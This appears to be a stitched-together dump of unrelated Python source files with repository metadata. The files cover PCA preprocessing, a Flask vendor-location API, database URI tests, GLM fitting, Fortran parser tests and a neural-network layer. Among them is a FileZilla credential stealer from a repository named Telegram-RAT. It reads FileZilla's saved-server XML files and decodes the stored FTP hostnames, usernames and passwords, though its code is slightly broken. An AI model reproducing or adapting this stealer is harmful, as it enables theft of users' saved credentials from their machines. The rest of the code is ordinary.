#print(f"one row of post_model:\n{post_model.iloc[0]}")
pre_base = df.drop(params, axis=1)
#print(f"one row of pre_base:\n{pre_base.iloc[0]}")
post_model.reset_index(drop=True, inplace=True)
pre_base.reset_index(drop=True, inplace=True)
post_full = pd.concat([pre_base, post_model], axis=1)
#print(f"one row of post_fill:\n{post_full.iloc[0]}")
#print(f"sizes:\npost_model: {post_model.shape}\npre_base: {pre_base.shape}\npost_full: {post_full.shape}\n")
return post_full
def joint_pca(train_data, predi_data, params):
# Run PCA on train_data to create a dimension-reduction model.
pca_train = train_data[params]
num_comps = choose_num_comps(pca_train)
#print(f"num_comps:\n{num_comps}\n")
model = fit_data(pca_train, num_comps)
#print(f"model:\n{model}\n")
#print(f"one row of train_data before:\n{train_data.iloc[1]}")
#print(f"one row of predi_data before:\n{predi_data.iloc[1]}")
# Apply the same model to both train and predi data.
train_data = apply_model(train_data, model, params, num_comps)
predi_data = apply_model(predi_data, model, params, num_comps)
#print(f"one row of train_data after:\n{train_data.iloc[1]}")
#print(f"one row of predi_data after:\n{predi_data.iloc[1]}")
components = model.named_steps["pca"].components_
return train_data, predi_data, components
if __name__ == "__main__":
train_in = sys.argv[1]
predi_in = sys.argv[2]
train_out = sys.argv[3]
predi_out = sys.argv[4]
log_file = sys.argv[5]
# Read in data files.
train_data = pd.read_csv(train_in, header=0)
predi_data = pd.read_csv(predi_in, header=0)
# Find param names.
params = get_params(train_data)
# Do that pca stuff.
train_pca, predi_pca, components = joint_pca(train_data, predi_data, params)
# Write the results to specified files.
train_pca.to_csv(path_or_buf=train_out, index=False)
predi_pca.to_csv(path_or_buf=predi_out, index=False)
# Log the pca components.
with open(log_file, "a") as log:
log.write("Component Eigenvalues:\n")
for i in range(len(params)):
log.write(f"{params[i]}:\n{[c[i] for c in components]}\n")
| 33.472868 | 113 | 0.700787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,697 | 0.393006 |
338af8622848bff11a1275eae70f3a73f237b0cc | 439 | py | Python | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | class Stats:
writes: int
reads: int
accesses: int
def __init__(self) -> None:
self.reset()
def reset(self) -> None:
self.writes = 0
self.reads = 0
self.accesses = 0
def add_reads(self, count: int = 1) -> None:
self.reads += count
self.accesses += count
def add_writes(self, count: int = 1) -> None:
self.writes += count
self.accesses += count
| 20.904762 | 49 | 0.542141 | 438 | 0.997722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
338b6987963d5d47f633929d5f959e0cea5cc7d2 | 120 | py | Python | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 11 | 2021-07-28T12:52:26.000Z | 2022-02-28T02:53:23.000Z | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 2 | 2021-11-01T09:36:48.000Z | 2021-12-13T12:32:09.000Z | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 1 | 2021-11-01T09:36:55.000Z | 2021-11-01T09:36:55.000Z | from .attribute_classifier import BranchedTinyAttr
from .face_parser import FaceParser
from .stylegan2 import Generator
| 30 | 50 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
338b7280d85cf38ca0b11c2d5921f28082cfcfc1 | 2,787 | py | Python | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | """
Tests for functionality in the utils module
"""
import mock
try:
import unittest2 as unittest
except ImportError:
import unittest
from queries import utils
class GetCurrentUserTests(unittest.TestCase):
@mock.patch('pwd.getpwuid')
def test_get_current_user(self, getpwuid):
"""get_current_user returns value from pwd.getpwuid"""
getpwuid.return_value = ['mocky']
self.assertEqual(utils.get_current_user(), 'mocky')
class URLParseTestCase(unittest.TestCase):
URI = 'pgsql://foo:bar@baz:5444/qux'
def test_urlparse_hostname(self):
"""hostname should match expectation"""
self.assertEqual(utils.urlparse(self.URI).hostname, 'baz')
def test_urlparse_port(self):
"""port should match expectation"""
self.assertEqual(utils.urlparse(self.URI).port, 5444)
def test_urlparse_path(self):
"""path should match expectation"""
self.assertEqual(utils.urlparse(self.URI).path, '/qux')
def test_urlparse_username(self):
"""username should match expectation"""
self.assertEqual(utils.urlparse(self.URI).username, 'foo')
def test_urlparse_password(self):
"""password should match expectation"""
self.assertEqual(utils.urlparse(self.URI).password, 'bar')
class URIToKWargsTestCase(unittest.TestCase):
URI = ('pgsql://foo:bar@baz:5444/qux?options=foo&options=bar&keepalives=1&'
'invalid=true')
def test_uri_to_kwargs_host(self):
"""hostname should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['host'], 'baz')
def test_uri_to_kwargs_port(self):
"""port should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['port'], 5444)
def test_uri_to_kwargs_dbname(self):
"""dbname should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['dbname'], 'qux')
def test_uri_to_kwargs_username(self):
"""user should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['user'], 'foo')
def test_uri_to_kwargs_password(self):
"""password should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['password'], 'bar')
def test_uri_to_kwargs_options(self):
"""options should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['options'],
['foo', 'bar'])
def test_uri_to_kwargs_keepalive(self):
"""keepalive should match expectation"""
self.assertEqual(utils.uri_to_kwargs(self.URI)['keepalives'], 1)
def test_uri_to_kwargs_invalid(self):
"""invalid query argument should not be in kwargs"""
self.assertNotIn('invaid', utils.uri_to_kwargs(self.URI))
| 32.788235 | 79 | 0.679584 | 2,608 | 0.935773 | 0 | 0 | 239 | 0.085755 | 0 | 0 | 864 | 0.310011 |
338bdb61b810291631438e77fffbc7457c38058b | 1,421 | py | Python | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 375 | 2020-03-17T06:20:50.000Z | 2022-03-29T22:27:23.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 44 | 2020-04-06T22:37:59.000Z | 2020-11-15T15:53:39.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 173 | 2020-04-01T17:17:26.000Z | 2022-03-24T13:28:15.000Z | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server | 33.046512 | 148 | 0.696692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 301 | 0.211823 |
338c3eed58a47fa30a2aa03ae3da78bb3efa67b1 | 535 | py | Python | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | from django.conf.urls.defaults import *
urlpatterns = patterns('oldcontrib.tools.gallery.views',
url(r'^add_to_gallery/$', view='add_to_gallery', name='add_to_gallery'),
url(r'^remove_from_gallery/$', view='remove_from_gallery', name='remove_from_gallery'),
url(r'^create_gallery/$', view='create_gallery', name='create_gallery'),
url(r'^update_gallery_order/$', view='update_gallery_order', name='update_gallery_order'),
url(r'^change_gallery_title/$', view='change_gallery_title', name='change_gallery_title'),
) | 59.444444 | 94 | 0.745794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 343 | 0.641121 |
338c9be69572a77ed6dc3ba19bdccb2d83d6f3ff | 4,333 | py | Python | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | null | null | null | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | 1 | 2015-08-28T01:59:24.000Z | 2015-08-28T01:59:24.000Z | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | null | null | null | # Copyright (C) 2015 Jeffrey Meyers
#
# This program is released under the "MIT License".
# Please see the file COPYING in this distribution for
# license terms.
import datetime
from flask import Blueprint, request, jsonify
from webargs import Arg
from webargs.flaskparser import use_args
import geoalchemy2.functions as func
from app import app, db
from app.models import Active, Locations
mod_api = Blueprint('api', __name__, url_prefix='/api')
@mod_api.errorhandler(422)
def handle_bad_request(err):
data = getattr(err, 'data')
if data: message = data['message']
else: message = 'Invalid request'
return jsonify({'error': message }), 422
@mod_api.route('/')
def index():
return "api module"
active_post_args = {
'vendor_id':Arg(str, required=True),
'active':Arg(str, required=True)
}
@mod_api.route("/active", methods=["POST"])
@use_args(active_post_args)
def active_post(args):
response = dict(**args)
response["success"] = True
try:
record = Active(**args)
db.session.add(record)
db.session.commit()
except Exception as e:
response["success"] = False
resonse["exception"] = str(e)
return jsonify(response)
def query_vendor_status(vendor_id):
return Active.query.filter_by(vendor_id=vendor_id)\
.order_by(Active.tstamp.desc())\
.first()
active_get_args = {
'vendor_id':Arg(str, required=True)
}
@mod_api.route('/active', methods=['GET'])
@use_args(active_get_args)
def active_get(args):
status = query_vendor_status(args["vendor_id"])
response = dict(**args)
# found matching record based on input vendor_id
# return status
if status:
response["success"] = True
response["active"] = status.active
# no matching vendor id
else:
response["success"] = False
response["msg"] = "no matching vendor_id"
return jsonify(response)
location_post_args = {
'vendor_id':Arg(str, required=True),
'lat':Arg(str, requred=True),
'lon':Arg(str, requred=True)
}
@mod_api.route("/location", methods=["POST"])
@use_args(location_post_args)
def location_post(args):
status = query_vendor_status(args["vendor_id"])
response = dict(vendor_id=args["vendor_id"], success=False)
if not status:
response["msg"] = "vendor does not exist".format(args["vendor_id"])
elif status and not status.active:
response["msg"] = "vendor is not currently active".\
format(args["vendor_id"])
elif status and status.active:
try:
location = Locations(**args)
db.session.add(location)
db.session.commit()
response["success"] = True
response["msg"] = "location updated".\
format(args["vendor_id"])
except Exception as e:
response["exception"] = str(e)
return jsonify(response)
def query_vendor_location(vendor_id):
return db.session.query(
Locations.vendor_id,
Locations.tstamp,
func.ST_X(Locations.geom).label("lon"),
func.ST_Y(Locations.geom).label("lat"))\
.filter_by(vendor_id=vendor_id)\
.order_by(Locations.tstamp.desc())\
.first()
location_get_args = {
'vendor_id':Arg(str, required=True)
}
@mod_api.route('/location', methods=['GET'])
@use_args(active_get_args)
def location_get(args):
status = query_vendor_status(args["vendor_id"])
response = dict(vendor_id=args["vendor_id"], success=False)
# vendor does not exists
if not status:
response["msg"] = "vendor does not exist".\
format(args["vendor_id"])
# vendor is not active
elif status and not status.active:
response["msg"] = "vendor is not currently active".\
format(args["vendor_id"])
# vendor is active so look up most recent coordinates
else:
location = query_vendor_location(args["vendor_id"])
if location:
response = dict(
success=True,
vendor_id=location.vendor_id,
tstamp=str(location.tstamp),
lat=location.lat,
lon=location.lon
)
else:
response["msg"] = "retrieving coordinates failed"
return jsonify(response)
| 27.775641 | 75 | 0.632587 | 0 | 0 | 0 | 0 | 2,995 | 0.691207 | 0 | 0 | 954 | 0.220171 |
338d8b38b7ae2a594d977bc4df33b494659dacc1 | 2,896 | py | Python | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | '''
Created on April 15, 2018
@author: Alejandro Molina
'''
import numpy as np
import warnings
from scipy.stats import gamma, lognorm
from sklearn.linear_model import ElasticNet
from spn.structure.leaves.conditional.Conditional import Conditional_Gaussian, Conditional_Poisson, \
Conditional_Bernoulli
import statsmodels.api as sm
from os.path import dirname
path = dirname(__file__) + "/"
def update_glm_parameters_mle(node, data, scope): # assume data is tuple (output np array, conditional np array)
assert len(scope) == 1, 'more than one output variable in scope?'
data = data[~np.isnan(data)].reshape(data.shape)
dataOut = data[:, :len(scope)]
dataIn = data[:, len(scope):]
assert dataOut.shape[1] == 1, 'more than one output variable in scope?'
if dataOut.shape[0] == 0:
return
dataIn = np.c_[dataIn, np.ones((dataIn.shape[0]))]
if isinstance(node, Conditional_Gaussian):
reg = ElasticNet(random_state=0, alpha=0.01, max_iter=2000, fit_intercept=False)
reg.fit(dataIn, dataOut)
if reg.n_iter_ < reg.max_iter:
node.weights = reg.coef_.tolist()
return
family = sm.families.Gaussian()
elif isinstance(node, Conditional_Poisson):
family = sm.families.Poisson()
elif isinstance(node, Conditional_Bernoulli):
family = sm.families.Binomial()
else:
raise Exception("Unknown conditional " + str(type(node)))
glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.0001, maxiter=5)
node.weights = glmfit.params.tolist()
return
try:
import tensorflow as tf
import tensorflow_probability as tfp;
tfd = tfp.distributions
dataOut = dataOut.reshape(-1)
w, linear_response, is_converged, num_iter = tfp.glm.fit(
model_matrix=tf.constant(dataIn),
response=tf.constant(dataOut),
model=tfp.glm.Poisson(),
l2_regularizer=0.0001)
log_likelihood = tfp.glm.Poisson().log_prob(tf.constant(dataOut), linear_response)
with tf.Session() as sess:
[w_, linear_response_, is_converged_, num_iter_, Y_, log_likelihood_] = sess.run(
[w, linear_response, is_converged, num_iter, tf.constant(dataOut), log_likelihood])
node.weights = w_
print("node.weights", node.weights)
# glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.001)
# node.weights = glmfit.params
# # if glmfit.converged is False:
# # warnings.warn("Maximum number of iterations reached")
except Exception:
glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.0001)
node.weights = glmfit.params
print("node.weights with glmfit", node.weights)
np.savez(path + "tmp_glm_mle_data", dataIn=dataIn, dataOut=dataOut)
| 34.891566 | 113 | 0.667472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 489 | 0.168854 |
338eac6a7e1d38c11cb457c1d528a675949db378 | 5,077 | py | Python | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 33 | 2017-08-18T16:31:27.000Z | 2022-03-28T09:43:50.000Z | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 319 | 2017-01-12T14:22:07.000Z | 2022-03-23T20:53:25.000Z | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 17 | 2017-10-13T07:12:28.000Z | 2022-02-11T14:42:18.000Z | # Copyright (c) 2019 Science and Technology Facilities Council
# All rights reserved.
# Modifications made as part of the fparser project are distributed
# under the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Tests for a Fortran 2003 R1011 control edit descriptor.'''
import pytest
from fparser.two.Fortran2003 import Control_Edit_Desc
from fparser.two.utils import NoMatchError, InternalError
def test_descriptors_match(f2003_create):
'''Check that valid control edit descriptors are parsed correctly when
they are dealt with by the match method. These are '/', ':', 'P'
and '$'. '$' is dealt with in separate tests as it is an
extension. We test with and without spaces.
'''
for my_input in ["/", " / ", "2/", " 2 / ", ":", " : ", "2P", " 2 P ",
"2p", " 2 p "]:
ast = Control_Edit_Desc(my_input)
assert str(ast) == my_input.upper().replace(" ", "")
def test_descriptors_subclass(f2003_create):
'''Check that valid control edit descriptors are parsed correctly when
they are passed onto subclasses. In this case we just test a
single example for each subclass to see if valid values are passed
on, as the subclass tests check all the options.
'''
for my_input in ["T2", "SS", "BN", "RU", "DC"]:
ast = Control_Edit_Desc(my_input)
assert str(ast) == my_input.upper()
def test_dollar_valid(f2003_create, monkeypatch):
'''Check that valid $ format specifications are parsed correctly if
the dollar-descriptor extension is specified. Also include an
example with spaces.
'''
from fparser.two import utils
monkeypatch.setattr(utils, "EXTENSIONS", ["dollar-descriptor"])
for my_input in ["$", " $ "]:
ast = Control_Edit_Desc(my_input)
assert str(ast) == my_input.upper().replace(" ", "")
def test_dollar_invalid(f2003_create, monkeypatch):
'''Check that valid '$' format specifications raise a NoMatchError if
the 'dollar-format' extension is not in the EXTENSIONS list.
'''
from fparser.two import utils
monkeypatch.setattr(utils, "EXTENSIONS", [])
for my_input in ["$", " $ "]:
with pytest.raises(NoMatchError):
_ = Control_Edit_Desc(my_input)
def test_invalid_format_errors(f2003_create):
'''Check that invalid format for the match method raises a
NoMatchError exception.
'''
for my_input in [None, "", " ", "//", "a /", "/ a", "::", "a :",
": a", "pp", "a p", "p a"]:
with pytest.raises(NoMatchError):
_ = Control_Edit_Desc(my_input)
def test_internal_error1(f2003_create, monkeypatch):
'''Check that an internal error is raised if the length of the Items
list is not 2 as the str() method assumes that it is.
'''
my_input = "3P"
ast = Control_Edit_Desc(my_input)
monkeypatch.setattr(ast, "items", [None, None, None])
with pytest.raises(InternalError) as excinfo:
str(ast)
assert "has '3' items, but expecting 2." in str(excinfo.value)
def test_internal_error2(f2003_create, monkeypatch):
'''Check that an internal error is raised if the descriptor name
(first entry of items) is empty or None as the str() method assumes
that it is a string with content.
'''
my_input = "3P"
ast = Control_Edit_Desc(my_input)
for content in [None, ""]:
monkeypatch.setattr(ast, "items", [ast.items[0], content])
with pytest.raises(InternalError) as excinfo:
str(ast)
assert "should be an edit descriptor name but is empty or None" \
in str(excinfo.value)
| 39.053846 | 74 | 0.696868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,235 | 0.637187 |
338f8fbc58d791841bc38c5b6a72926e9899414e | 6,486 | py | Python | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 12 | 2018-03-14T18:06:16.000Z | 2020-07-21T12:06:53.000Z | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 10 | 2018-02-26T21:18:15.000Z | 2019-01-25T17:16:20.000Z | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 7 | 2018-02-26T19:23:00.000Z | 2019-03-11T01:21:54.000Z | """
This module contains utility functions used in the conversion of the downloaded
data to TFrecords as well as functions used by the model/training script.
Semantic segmenation evaluations methods were taken from
https://github.com/martinkersner/py_img_seg_eval
"""
import os
import fnmatch
import logging
import cv2
import numpy as np
from PIL import Image
from tqdm import tqdm
import tensorflow as tf
def set_logging_verbosity(verbose_level=3):
"""Set the level of logging verbosity."""
if not isinstance(verbose_level, int):
raise TypeError("verbose_level must be an int")
if not (0 <= verbose_level <= 4):
raise ValueError("verbose_level must be between 0 and 4")
verbosity = [logging.CRITICAL,
logging.ERROR,
logging.WARNING,
logging.INFO,
logging.DEBUG]
logging.basicConfig(
format='%(asctime)s:\t %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=verbosity[verbose_level])
def compute_batch_pixel_accuracy(predicted_masks, ground_truth_masks):
"""
Compute the the average pixel accuracy across a batch of ground truth masks
and their respective predicted masks given by the network.
"""
return np.mean(
[pixel_accuracy(np.squeeze(predicted_masks[i]), np.squeeze(ground_truth_masks[i]))
for i in range(len(predicted_masks))])
def load_data_paths(data_root_directory, extra_ignore_regexes=None):
"""
Provide a generic function to load paths of image data files.
This function loads only the `string` paths, it does not load images into memory.
"""
root_path = os.path.realpath(data_root_directory)
# Load the image file extensions that the scanner uses
extensions = ['.png', '.jpg']
full_file_list = []
for ext in extensions:
# Using os.walk and fnmatch here instead of glob to remain compatible
# with Python 2
file_list = [os.path.join(dir_path, f)
for dir_path, dirnames, files in os.walk(root_path)
for f in fnmatch.filter(files, '*' + ext)]
full_file_list.extend(file_list)
for scan_path in full_file_list:
yield scan_path
def _bytes_feature(value):
"""Convert a bytearray into a Feature."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
"""Convert a scalar int into a Feature."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def build_semseg_record(images_to_masks, tfrecords_filename, resize_dims):
"""Convert an iterable of paths to semseg images into a TFRecords object."""
writer = tf.python_io.TFRecordWriter(tfrecords_filename)
for image_path, mask_path in tqdm(images_to_masks.items()):
image = cv2.imread(image_path)
mask = cv2.imread(mask_path, 0)
mask = cv2.resize(mask, resize_dims[::-1], interpolation=cv2.INTER_AREA)
image = cv2.resize(image, resize_dims[::-1], interpolation=cv2.INTER_AREA)
# Save original dimensions
h, w, _ = image.shape
# Add axis for QueueRunners
mask = np.expand_dims(mask, axis=-1)
# convert the image and mask to their raw bytes repr
mask_raw = mask.tostring()
image_raw = image.tostring()
# Encode one example at a time
example = tf.train.Example(features=tf.train.Features(feature={
'original_height': _int64_feature(h),
'original_width': _int64_feature(w),
'resized_height': _int64_feature(resize_dims[0]),
'resized_width': _int64_feature(resize_dims[1]),
'image_raw': _bytes_feature(image_raw),
'mask_raw': _bytes_feature(mask_raw)}))
writer.write(example.SerializeToString())
writer.close()
def symbolic_read_and_decode_semseg_tfrecord(
filename_queue, resize_dims, batch_size, num_threads, min_after_dequeue):
"""
Given a TFRecord file generated by `kml.utils.serialize.semseg_files_to_tfrecords`,
construct symbolic (image, mask) batches from it, adding all
relevant ops to the graph.
"""
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(
serialized_example,
features={
'original_height': tf.FixedLenFeature([], tf.int64),
'original_width': tf.FixedLenFeature([], tf.int64),
'resized_height': tf.FixedLenFeature([], tf.int64),
'resized_width': tf.FixedLenFeature([], tf.int64),
'image_raw': tf.FixedLenFeature([], tf.string),
'mask_raw': tf.FixedLenFeature([], tf.string)})
# Decode the image/mask back from bytes to uint8
image = tf.decode_raw(features['image_raw'], tf.uint8)
mask = tf.decode_raw(features['mask_raw'], tf.uint8)
# Reshape to the image's original shape
image = tf.reshape(image, (*resize_dims, 3))
mask = tf.reshape(mask, (*resize_dims, 1))
# Use capacity formula recommended by tensorflow
capacity = min_after_dequeue + (num_threads + 1) * batch_size
# Add queue/shuffling related ops to the graph
image_batch, mask_batch= tf.train.shuffle_batch(
[image, mask], batch_size=batch_size, capacity=capacity,
num_threads=num_threads, min_after_dequeue=min_after_dequeue)
return image_batch, mask_batch
def build_tfrecords_batch(*paths_to_tfrecords, image_shape, batch_size, max_iterations, min_after_dequeue=100):
"""Build tensors for a batch of data given the path to tfrecord file"""
filename_queue = tf.train.string_input_producer(
[*paths_to_tfrecords], num_epochs=max_iterations)
image_batch, label_batch = symbolic_read_and_decode_semseg_tfrecord(
filename_queue, image_shape, batch_size=batch_size,
num_threads=4, min_after_dequeue=min_after_dequeue)
return image_batch, label_batch
def add_color(img, num_classes=32):
"""Given a 1-channel color map; convert it to a colored mask."""
h, w = img.shape
img_color = np.zeros((h, w, 3))
for i in range(1, 151):
img_color[img == i] = to_color(i)
img_color[img == num_classes] = (1.0, 1.0, 1.0)
return img_color
def to_color(category):
"""Map each category color a good distance away from each other on the HSV color space."""
import colorsys
v = (category - 1) * (137.5 / 360)
return colorsys.hsv_to_rgb(v, 1, 1)
| 35.442623 | 111 | 0.68301 | 0 | 0 | 828 | 0.12766 | 0 | 0 | 0 | 0 | 1,985 | 0.306044 |
3390381ad2adf5630233e515d79350ddfc4af053 | 5,685 | py | Python | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 28 | 2019-08-19T15:46:12.000Z | 2022-02-17T16:32:13.000Z | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 3 | 2020-07-05T17:16:44.000Z | 2022-03-28T10:03:36.000Z | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 7 | 2019-09-17T09:13:57.000Z | 2022-02-15T08:50:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from NumPyNet.activations import Activations
from NumPyNet.utils import _check_activation
from NumPyNet.utils import check_is_fitted
import numpy as np
from NumPyNet.layers.base import BaseLayer
__author__ = ['Mattia Ceccarelli', 'Nico Curti']
__email__ = ['mattia.ceccarelli3@studio.unibo.it', 'nico.curti2@unibo.it']
class Activation_layer(BaseLayer):
'''
Activation layer
Parameters
----------
input_shape : tuple (default=None)
Input dimensions as tuple of 4 integers
activation : str or Activation object
Activation function to apply into the layer.
Example
-------
>>> import os
>>> import pylab as plt
>>> from PIL import Image
>>> from NumPyNet import activations
>>>
>>> activation_func = activations.Relu()
>>>
>>> img_2_float = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 1.)).astype(float)
>>> float_2_img = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 255.)).astype(np.uint8)
>>>
>>> filename = os.path.join(os.path.dirname(__file__), '..', '..', 'data', 'dog.jpg')
>>> inpt = np.asarray(Image.open(filename), dtype=float)
>>> inpt.setflags(write=1)
>>> inpt = img_2_float(inpt)
>>> # Relu activation constrain
>>> inpt = inpt * 2 - 1
>>>
>>> # add batch = 1
>>> inpt = np.expand_dims(inpt, axis=0)
>>>
>>> layer = Activation_layer(input_shape=inpt.shape, activation=activation_func)
>>>
>>> # FORWARD
>>>
>>> layer.forward(inpt)
>>> forward_out = layer.output
>>> print(layer)
>>>
>>> # BACKWARD
>>>
>>> layer.delta = np.ones(shape=inpt.shape, dtype=float)
>>> delta = np.zeros(shape=inpt.shape, dtype=float)
>>> layer.backward(delta, copy=True)
